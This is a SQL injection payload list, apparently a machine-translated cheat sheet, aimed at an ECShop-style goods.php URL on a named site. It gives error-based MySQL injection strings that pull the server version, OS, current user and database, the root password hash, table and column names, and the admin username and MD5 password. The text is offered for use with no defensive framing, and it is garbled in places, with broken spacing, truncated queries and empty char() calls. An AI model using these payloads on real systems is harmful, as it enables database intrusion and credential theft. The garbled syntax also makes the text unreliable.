Judge version number
(Select%20count (*), concat (select%20@ @version%20), 0x3a,floor (rand () *2))%20x%20from%20 (select%201%20union% 20select%202)%20a%20group%20by%20x%20limit%201)%23 ">http://www.badguest.cn/goods.php?id=352&wsid=1% 20and%20 (1,1) > (Select%20count (*), concat (select%20@ @version%20), 0x3a,floor (rand () *2))%20x%20from%20 (select% 201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Judgment System
(Select%20count (*), concat (select%20@ @version_compile_os%20), 0x3a,floor (rand () *2))%20x%20from%20 (select%201% 20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 ">http://www.badguest.cn/goods.php?id=352& Wsid=1%20and%20 (1,1) > (Select%20count (*), concat (select%20@ @version_compile_os%20), 0x3a,floor (rand () *2))%20x %20from%20 (select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current User ()
(Select%20count (*), concat (Select%20user ()%20), 0x3a,floor (rand () *2))%20x%20from%20 (select%201%20union%20select %202)%20a%20group%20by%20x%20limit%201)%23 ">http://www.badguest.cn/goods.php?id=352&wsid=1%20and%20 (1,1 ) > (Select%20count (*), concat (Select%20user ()%20), 0x3a,floor (rand () *2))%20x%20from%20 (select%201%20union% 20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database ()
(Select%20count (*), concat (Select%20database ()%20), 0x3a,floor (rand () *2))%20x%20from%20 (select%201%20union% 20select%202)%20a%20group%20by%20x%20limit%201)%23 ">http://www.badguest.cngoods.php?id=352&wsid=1%20and %20 (1,1) > (Select%20count (*), concat (Select%20database ()%20), 0x3a,floor (rand () *2))%20x%20from%20 (select%201% 20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Root Hash
(Select%20count (*), concat (Select%20password%20from%20mysql.user%20where%20user=char (114,111,111,116)), 0x3a, Floor (rand () *2))%20x%20from%20 (select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 ">http ://www.badguest.cn/goods.php?id=352&wsid=1%20and%20 (1,1) > (Select%20count (*), concat (select%20password% 20from%20mysql.user%20where%20user=char (114,111,111,116)), 0x3a,floor (rand () *2))%20x%20from%20 (select%201% 20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database table name
(Select%20count (*), concat (select%20table_name%20%20from%20information_schema.tables%20where%20table_schema= char (115,97,110,115,97,110,49)%20limit%206,1), 0x3a,floor (rand () *2)%20x%20from%20 (select%201%20union%20select% %20a%20group%20by%20x%20limit%201)%23 ">http://www.badguest.cn/goods.php?id=352&wsid=1%20and%20 (1,1) > (Select%20count (*), concat (Select%20table_name%20%20from%20information_schema.tables%20where%20table_ Schema=char (115,97,110,115,97,110,49)%20limit%206,1), 0x3a,floor (rand () *2))%20x%20from%20 (select%201%20union% 20select%202)%20a%20group%20by%20x%20limit%201)%23
Current Database user_name Field
(Select%20count (*), concat (Select%20%20column_name%20from%20information_schema. Columns%20where%20table_schema=char (115,97,110,115,97,110,49)%20and%20table_name=char ( 101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1), 0x3a,floor (rand () *2))%20x%20from%20 (select %201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 ">http://www.badguest.cn/goods.php?id=352 &wsid=1%20and%20 (1,1) > (Select%20count (*), concat (Select%20%20column_name%20from%20information_schema. Columns%20where%20table_schema=char (115,97,110,115,97,110,49)%20and%20table_name=char ( 101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1), 0x3a,floor (rand () *2))%20x%20from%20 (select %201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database field password
(Select%20count (*), concat (Select%20%20column_name%20from%20information_schema. Columns%20where%20table_schema=char (115,97,110,115,97,110,49)%20and%20table_name=char ( 101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1), 0x3a,floor (rand () *2))%20x%20from%20 (select %201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 ">http://www.badguest.cn/goods.php?id=352 &wsid=1%20and%20 (1,1) > (Select%20count (*), concat (Select%20%20column_name%20from%20information_schema. Columns%20where%20table_schema=char (115,97,110,115,97,110,49)%20and%20table_name=char ( 101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1), 0x3a,floor (rand () *2))%20x%20from%20 (select %201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Get admin passwd (MD5)
(Select%20count (*), concat (Select%20concat_ws (char), ifnull (CAST (%60password%60%20as%20char), char (32)), Ifnull (CAST (%60user_name%60%20as%20char), char ())%20%20from%20sansan1.ecs_admin_user%20limit%200,1), 0x3a, Floor (rand () *2))%20x%20from%20 (select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 ">http ://www.badguest.cn/goods.php?id=352&wsid=1%20and%20 (1,1) > (Select%20count (*), concat (Select%20concat_ws ( char (), Ifnull (CAST (%60password%60%20as%20char), char (), Ifnull (CAST (%60user_name%60%20as%20char), char (32)) %20%20from%20sansan1.ecs_admin_user%20limit%200,1), 0x3a,floor (rand () *2))%20x%20from%20 (select%201%20union% 20select%202)%20a%20group%20by%20x%20limit%201)%23
MySQL Error blind-note statement